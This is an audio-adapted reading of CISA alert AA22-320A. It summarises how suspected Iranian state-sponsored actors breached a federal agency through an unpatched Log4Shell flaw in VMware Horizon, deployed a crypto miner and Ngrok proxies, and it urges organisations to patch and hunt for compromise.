CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester.

This is a CISA Cybersecurity Alert. ID number Alpha Alpha Two Two tack Three Two Zero Alpha.

Original release date – November Sixteenth, twenty twenty two.

From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch organization where CISA observed suspected APT activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence. CISA and the FBI assess that the network was compromised by Iranian government-sponsored APT actors.

CISA and the FBI are releasing this alert to provide the suspected Iranian government-sponsored actors’ TTPs and indicators of compromise to help network defenders detect and protect against related compromises.

CISA and the FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities. If suspected initial access or compromise is detected based on IOCs or TTPs described in this alert, CISA and the FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems and the domain controller, and audit privileged accounts. All organizations, regardless of identified evidence of compromise, should apply the recommendations in the Mitigations section of this alert to protect against similar malicious cyber activity.

The alert documentation linked in the show notes includes additional technical details related to this APT activity, indicators of compromise, TTPs, incident response recommendations, and mitigation actions.

To report incidents and anomalous activity or to request incident response resources or technical assistance, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

This report was written by CISA, the United States Cybersecurity and Infrastructure Security Agency, and edited and adapted for audio by the CyberWire as a public service. Please visit www dot cisa dot gov to read the full report which may include additional details, links, and illustrations. A link to this report can be found in the show notes.

This has been a CISA Cybersecurity Alert.